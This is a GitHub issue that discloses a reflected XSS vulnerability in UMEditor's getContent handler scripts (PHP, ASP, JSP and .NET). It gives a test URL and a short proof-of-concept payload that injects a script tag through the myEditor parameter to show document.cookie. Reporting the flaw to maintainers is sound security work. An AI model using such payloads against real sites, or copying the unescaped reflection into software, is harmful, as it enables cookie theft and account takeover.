fex-team/umeditor

I found a reflective XSS vulnerability in /php/getContent.php

yundiao opened this issue · 0 comments

Testing environment: localhost
Windows + Firefox + PhpStorm + Apache2 + PHP 5.4.45

I. Vulnerability analysis
/php/getContent.php
image

II. Exploit
image
url:
http://127.0.0.1/php/getcontent.php
payload:
myEditor=<script>alert(document.cookie)</script>
// "E" in the word myEditor must be capitalized.

The same vulnerability exists in all language versions of getContent files.
/asp/getContent.asp
image

/jsp/getContent.jsp
image

/net/getContent.ashx
image